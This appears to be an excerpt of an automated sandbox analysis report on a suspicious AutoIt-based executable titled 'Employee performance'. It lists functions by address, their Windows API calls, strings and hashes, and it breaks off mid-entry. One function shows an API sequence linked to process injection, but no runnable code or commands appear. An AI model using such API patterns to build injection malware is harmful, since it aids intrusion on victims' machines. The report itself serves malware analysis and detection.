Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 45227eac1fbc1206a753151aa8a11ccfbeda003d5a2bda4cf367a90fae922894
Instruction ID: 74f70b8f6bf049271a868a4353392cef63fbf68a4fbe97bab7272c6edcaf19ad
Opcode Fuzzy Hash: 45227eac1fbc1206a753151aa8a11ccfbeda003d5a2bda4cf367a90fae922894
Instruction Fuzzy Hash: 0832EC31A00219DFDB20CF58C894BBEB7BAEF44310F19805AF985AB355C778AD41EB91

Function 00F9129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F91A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F91AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F91B13

Memory Dump Source

Source File: 00000000.00000002.1261034105.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_Employee performance.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction ID: c5b1f9e50ea684fa7c663a3fd0adaf1a693a314c65b017b494a0e20181229b03
Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction Fuzzy Hash: D212CE24E18658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A5F81CB5A

Function 00FD4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FD4EDD,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E9C
Part of subcall function 00FD4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FD4EAE
Part of subcall function 00FD4E90: FreeLibrary.KERNEL32(00000000,?,?,00FD4EDD,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4EFD

Part of subcall function 00FD4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,01013CDE,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E62
Part of subcall function 00FD4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FD4E74
Part of subcall function 00FD4E59: FreeLibrary.KERNEL32(00000000,?,?,01013CDE,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E87

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: d11dbeee35e29109e1896679d2ccca8c54aece4c1ce260720c677a294205f5c1
Instruction ID: 531c4ac09412a6fc11e8cc4abc51feda5b6f890c6eea477f5dfed4a20dac05b3
Opcode Fuzzy Hash: d11dbeee35e29109e1896679d2ccca8c54aece4c1ce260720c677a294205f5c1
Instruction Fuzzy Hash: DC110A32600205ABDF14FF64DD16FAD77A6AF40B10F14442FF592AB2E1DE78AA05B750

Function 01008402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 01008440

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d374f3d311a6b5af67ddea401336bcd465707ede16adf6be6bbead75dbd26a5f
Instruction ID: 88115d139422b21e92edd4a02dad9b110e91a9222586bb2933ccadbb71cc8f35
Opcode Fuzzy Hash: d374f3d311a6b5af67ddea401336bcd465707ede16adf6be6bbead75dbd26a5f
Instruction Fuzzy Hash: 8211487190410AAFDB06DF58E9409DE7BF9FF48300F01809AF848AB341DB31DA11CBA4

Function 00FFE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: 2870e560871c4e9d6c1568b27c5cd85f9a547272a3a8b62ad37626ae1d7dc924
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: F6F02D32920E1C96D7333E658C04BBA33989F62330F100716F665D71F0DB74D401A9A5

Function 01003820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d871a61536783a69ec361397fd92ac5da58bf10246a05de0707c7bd82dfcde5d
Instruction ID: d5884f2b058cbf24406a722b06812c2019f863f25db3f4f51ab3928b72c925c2
Opcode Fuzzy Hash: d871a61536783a69ec361397fd92ac5da58bf10246a05de0707c7bd82dfcde5d
Instruction Fuzzy Hash: 77E065311017299EF7732A6A9C05BAB3A89BF426B0F0501E1FED59E5D1DB25EA0183F1

Function 01004D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01004D9C

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: e7b43e91ff337e9539a14cecb2270b6983c0bf49060c3b945a5b3439308ed7ba
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: 47E092361003059F9761DF6CD400AC2BBF4EF94360721852AEADDD3351D331E412CB80

Function 00FD4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4F6D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 84347deee13fbdfc610fe230a70d6f23ce87fccfc4c762eb857deefa1d527ec7
Instruction ID: 758da958ad098c2cfab47a6241142af78be3d9bcc26c12b3670cf7f4fd82b309
Opcode Fuzzy Hash: 84347deee13fbdfc610fe230a70d6f23ce87fccfc4c762eb857deefa1d527ec7
Instruction Fuzzy Hash: 4FF03071505751CFDB359F64D490922BBF5AF14329318897FE1EA83630C731A844EF10

Function 00FD2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD2DC4

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: f7adc9df84ddb6a63cea3d3a7f8b355fa40f5f813c1b0d66107d0914ac88fd9a
Instruction ID: 48ac6af07303ca716591873c3471a1a5e296cb743c86dd32b97bc22756cb9cfe
Opcode Fuzzy Hash: f7adc9df84ddb6a63cea3d3a7f8b355fa40f5f813c1b0d66107d0914ac88fd9a
Instruction Fuzzy Hash: EFE0CD726041245BC721A2589C05FDA77DDDFC8790F040076FD49D724CD974AD808650

Function 01042693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 010426B5

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: a50740272028c7a3aed4e32c4aeaae7153eeca5da09cdb0cb1b0370efab8cc8a
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: A6E04FB0609B005FDF396E2CA8917B677E99F4A340F00086EF6DB93262E57268458A4D

Function 00FD2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FD3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD3908

Part of subcall function 00FDD730: GetInputState.USER32 ref: 00FDD807

SetCurrentDirectoryW.KERNEL32(?), ref: 00FD2B6B

Part of subcall function 00FD30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FD314E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 532a4879d5e4bb721bc41409a16d6a8bad6c1ebefbed8736fd71b07001b79c4c
Instruction ID: 79fa7a0aa32b944c6d4863f1f671b04a94e653d01f646aca1beb22feb4051445
Opcode Fuzzy Hash: 532a4879d5e4bb721bc41409a16d6a8bad6c1ebefbed8736fd71b07001b79c4c
Instruction Fuzzy Hash: 7FE0263270420402CA04BB74AC1246DB74B9BD1351F88053FF28283353CE7D4A456352

Function 0101039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,01010704,?,?,00000000,?,01010704,00000000,0000000C), ref: 010103B7

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e3a0b452ff7ccdb9f1555dc64106fe0bf60d66870a336a6f127f754342134f5
Instruction ID: d6fb79117f2053f2d6affabce41156853937d56249e1fc94309cdac6f161e810
Opcode Fuzzy Hash: 4e3a0b452ff7ccdb9f1555dc64106fe0bf60d66870a336a6f127f754342134f5
Instruction Fuzzy Hash: 50D06C3204010DFBDF128F84DD06EDA3BAAFB48714F014000FE5856020C736E821AB90

Function 00FD1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00FD1CBC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 3303c62dd2069b02f761bdd6db85cdfd646d25b76e500510769427ee9d2f6209
Instruction ID: 8b1f48b39f199d850f188b09c2e32a8d2087fcdb776cedf2e376f5d70f0e50e9
Opcode Fuzzy Hash: 3303c62dd2069b02f761bdd6db85cdfd646d25b76e500510769427ee9d2f6209
Instruction Fuzzy Hash: EFC09B36280704DFF2344A90BD4AF107755B348B10F448001F6C9555D7C3B71450DB50

Function 00FEFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00FEFD1F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 058c9a025ae5baf8904e757122ea37850947b6cd739bb39bdb1a4f095e395d93
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: D9311A75A00149DBD728CF5AD480A69FBA1FF49310B7486A5E809CF651E731EEC5EBC0

Function 00F922A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F922B1

Memory Dump Source

Source File: 00000000.00000002.1261034105.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_Employee performance.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: fc9de3356d54ca9033ad46a5c34cccbb76286176dd5ee4b85f9adf9add6ca1f5
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 16E0E67494010EEFDB00EFB8D54969E7FB4EF04301F1001A1FD01D2280D6309D509A72

Non-executed Functions

Function 01069576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0106961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0106965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0106969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010696C9
SendMessageW.USER32 ref: 010696F2
GetKeyState.USER32(00000011), ref: 0106978B
GetKeyState.USER32(00000009), ref: 01069798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 010697AE
GetKeyState.USER32(00000010), ref: 010697B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010697E9
SendMessageW.USER32 ref: 01069810
SendMessageW.USER32(?,00001030,?,01067E95), ref: 01069918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0106992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 01069941
SetCapture.USER32(?), ref: 0106994A
ClientToScreen.USER32(?,?), ref: 010699AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 010699BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010699D6
ReleaseCapture.USER32 ref: 010699E1
GetCursorPos.USER32(?), ref: 01069A19
ScreenToClient.USER32(?,?), ref: 01069A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 01069A80
SendMessageW.USER32 ref: 01069AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 01069AEB
SendMessageW.USER32 ref: 01069B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 01069B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 01069B4A
GetCursorPos.USER32(?), ref: 01069B68
ScreenToClient.USER32(?,?), ref: 01069B75
GetParent.USER32(?), ref: 01069B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 01069BFA
SendMessageW.USER32 ref: 01069C2B
ClientToScreen.USER32(?,?), ref: 01069C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 01069CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 01069CDE
SendMessageW.USER32 ref: 01069D01
ClientToScreen.USER32(?,?), ref: 01069D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 01069D82

Part of subcall function 00FE9944: GetWindowLongW.USER32(?,000000EB), ref: 00FE9952

GetWindowLongW.USER32(?,000000F0), ref: 01069E05

Strings

@GUI_DRAGID, xrefs: 0106997D
F, xrefs: 01069D07

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: b96ec53b55a4f4320d20e15ca76bdc34b4ee4f318efdc167f5292175f96d7965
Instruction ID: bc1c309c7c99d1527d03c21140360d2bbec3afd5f6d5a80b944bc77a6a8719f8
Opcode Fuzzy Hash: b96ec53b55a4f4320d20e15ca76bdc34b4ee4f318efdc167f5292175f96d7965
Instruction Fuzzy Hash: 75428B34204341AFEB25CF28C944AAABBE9FF4D318F040659F6D9876A1D776E850CF51

Function 01064873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 010648F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 01064908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 01064927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0106494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0106495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0106497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 010649AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 010649D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 01064A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01064A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01064A7E
IsMenu.USER32(?), ref: 01064A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01064AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01064B20
GetWindowLongW.USER32(?,000000F0), ref: 01064B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 01064BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 01064C82
wsprintfW.USER32 ref: 01064CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01064CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 01064CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01064D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01064D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 01064D5A

Strings

%d/%02d/%02d, xrefs: 01064CA8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 1d5389cf9555cd709680f9f2c9916b79942e30334f6fa63752c6fed969e34993
Instruction ID: 57353563de1f34de50c8b69ba6af0bedbc1eb7c933b3c4bc2ba3d66ba378ea6d
Opcode Fuzzy Hash: 1d5389cf9555cd709680f9f2c9916b79942e30334f6fa63752c6fed969e34993
Instruction Fuzzy Hash: 56122331600244ABFB259F28DC49FAE7BF8EF49710F044169F695DB2E1DB78A940CB50

Function 00FEF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

